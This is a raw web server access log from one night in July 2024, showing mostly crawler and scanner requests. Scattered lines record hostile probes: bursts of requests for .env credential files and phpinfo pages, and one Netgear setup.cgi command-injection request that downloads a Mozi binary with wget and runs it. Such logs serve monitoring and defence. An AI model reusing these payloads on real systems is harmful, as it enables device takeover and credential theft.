156.59.198.135 - - [29/Jul/2024:02:01:43 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11851318.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:05:28 +0200] "GET /renault.activities.at/htdocs/activities/framework/treeview/readme.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:06:00 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-ba.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:02:06:31 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-ca.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
4.151.38.149 - - [29/Jul/2024:02:08:48 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [29/Jul/2024:02:11:20 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-it.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.189 - - [29/Jul/2024:02:27:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
92.249.48.202 - - [29/Jul/2024:02:38:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [29/Jul/2024:02:39:08 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12384455.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:39:55 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011130903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:02:43:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108241003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:02:43:32 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11451713.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:47:41 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11983587.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:48:02 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:48:23 +0200] "GET /hausegger.activities.at/stats/lang/tooltips_f/awstats-tt-en.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:55:37 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004220903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:02:56:41 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-kr.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.224.128.74 - - [29/Jul/2024:02:58:37 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
185.224.128.43 - - [29/Jul/2024:02:58:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [29/Jul/2024:03:02:48 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010191203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.43.185.39 - - [29/Jul/2024:03:31:33 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [29/Jul/2024:03:38:11 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-is.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:03:51:03 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12430790.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:04:01:30 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012291503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:02:41 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12465205.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:09:54 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-tr.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:10:40 +0200] "GET /default/cgi-bin/lang/awstats-sk.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.156.68.162 - - [29/Jul/2024:04:17:20 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)"
5.8.11.202 - - [29/Jul/2024:04:23:21 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Safari/605.1.15"
156.59.198.136 - - [29/Jul/2024:04:38:35 +0200] "GET /default/cgi-bin/lang/awstats-hr.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:04:38:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11282185.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:44:11 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12135482.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [29/Jul/2024:04:44:24 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Jul/2024:04:44:37 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101051403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:04:46:01 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-jp.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:47:03 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109201603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:04:50:21 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10619324.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.50.206 - - [29/Jul/2024:04:50:41 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.58.248 - - [29/Jul/2024:04:51:06 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:04:53:47 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10658395.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:04:59:55 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10745029.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.179 - - [29/Jul/2024:05:00:06 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 7.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Linux; Android 6.0.1; LGLS676 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Mobile Safari/537.36"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "\x16\x03\x01\x01C\x01" 400 383 "-" "-"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "GET /dev/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; U; Linux i686; lt; rv:1.6) Gecko/20051114 Firefox/1.5"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "GET /www/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:27.0) Gecko/20100101 Firefox/27.0"
78.153.140.179 - - [29/Jul/2024:05:00:07 +0200] "GET /home/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Android 5.0; Mobile; rv:48.0) Gecko/48.0 Firefox/48.0"
78.153.140.179 - - [29/Jul/2024:05:00:08 +0200] "GET /staging/.env HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; YComp 5.0.0.0)"
78.153.140.179 - - [29/Jul/2024:05:00:08 +0200] "GET /test/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Android 6.0.1; Mobile; rv:45.0) Gecko/45.0 Firefox/45.0"
78.153.140.179 - - [29/Jul/2024:05:00:08 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-gb; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
156.59.198.136 - - [29/Jul/2024:05:01:12 +0200] "GET /default/cgi-bin/lang/awstats-sr.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:05:03:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102101703_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:05:07:34 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11667182.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:05:08:43 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106080803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
62.219.128.42 - - [29/Jul/2024:05:09:05 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 364 "-" "-"
156.59.198.136 - - [29/Jul/2024:05:11:25 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911080903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
82.147.84.180 - - [29/Jul/2024:05:17:48 +0200] "\x16\x03\x01" 400 383 "-" "-"
82.147.84.180 - - [29/Jul/2024:05:17:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
156.59.198.135 - - [29/Jul/2024:05:36:53 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911221203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:05:38:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009221503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:05:39:28 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12478572.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [29/Jul/2024:05:39:53 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [29/Jul/2024:05:39:58 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11483064.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
34.140.160.62 - - [29/Jul/2024:05:40:23 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2"
156.59.198.135 - - [29/Jul/2024:05:41:25 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10608527.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:05:49:06 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102240803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:05:49:36 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008311103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:05:51:39 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-it.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:05:54:22 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008111103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:05:58:54 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-tw.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:06:01:22 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11795141.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:03:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12090470.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:06:08:43 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11424504.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:09:05 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-hu.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:06:14:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10922318.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:16:20 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006151103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [29/Jul/2024:06:17:45 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
205.210.31.83 - - [29/Jul/2024:06:25:00 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
78.153.140.177 - - [29/Jul/2024:06:27:14 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2; Creative AutoUpdate v1.41.07)"
78.153.140.177 - - [29/Jul/2024:06:27:15 +0200] "GET /laravel/.env HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)"
78.153.140.177 - - [29/Jul/2024:06:27:17 +0200] "\x16\x03\x01\x01G\x01" 400 383 "-" "-"
78.153.140.177 - - [29/Jul/2024:06:27:17 +0200] "GET /demo/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (ipad Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.498.0 Safari/534.6"
78.153.140.177 - - [29/Jul/2024:06:27:19 +0200] "GET /web/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-T580 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Safari/537.36 OPR/44.1.2246.123029"
78.153.140.177 - - [29/Jul/2024:06:27:20 +0200] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.28 (KHTML, like Gecko) Version/3.2.2 Safari/525.28.1"
78.153.140.177 - - [29/Jul/2024:06:27:21 +0200] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MANMJS; rv:11.0) like Gecko"
78.153.140.177 - - [29/Jul/2024:06:27:22 +0200] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F68 Safari/601.1"
78.153.140.177 - - [29/Jul/2024:06:27:23 +0200] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
156.59.198.135 - - [29/Jul/2024:06:33:39 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-se.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:40:17 +0200] "GET /ed.activities.at/stats/lang/tooltips_m/awstats-tt-is.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:41:49 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035108.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:06:42:59 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11038061.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.238.181.33 - - [29/Jul/2024:06:56:01 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [29/Jul/2024:06:56:56 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909061703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:06:58:56 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105191003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [29/Jul/2024:07:00:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11043588.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:01:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11549206.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:01:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11794913.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:06:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107091403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.152.52.241 - - [29/Jul/2024:07:08:17 +0200] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
156.59.198.135 - - [29/Jul/2024:07:14:06 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109151003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [29/Jul/2024:07:34:23 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-sk.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
